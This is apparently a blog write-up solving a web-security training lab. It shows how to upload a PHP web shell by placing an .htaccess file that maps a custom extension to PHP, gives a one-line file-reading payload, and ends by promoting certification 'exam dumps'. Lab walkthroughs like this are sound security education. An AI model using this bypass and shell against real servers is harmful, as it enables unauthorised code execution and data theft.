8.4 Lab: Web shell upload via extension blacklist bypass | 2024

This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner | Karthikeyan Nagaraj

Description

This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Solution

1. Log in to your Account with wiener:peter
2. Turn on the Proxy and upload shell.php which contains the below code
   <?php echo file_get_contents(‘/home/carlos/secret’); ?>
3. Send the request to Repeater and change the below values,
filename=”.htaccess” ,
Content-Type: text/plain ,
Remove the Payload,
   Add the header - AddType application/x-httpd-php .shell
4. Send the request, undo the changes, and send the same request by replacing the filename to shell.shell
5. Now, go to My-Account, refresh the page, Right-click the Image, and ClickOpen Image in New Tab
6. Copy the Secret code and paste it in the Solution to solve the Lab

A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups

Cyberw1ng

Telegram Channel for Free Ethical Hacking Dumps

Ethical Hacking Dumps — CEH, OSCP, Comptia

Thank you for Reading!

Happy Ethical Hacking ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng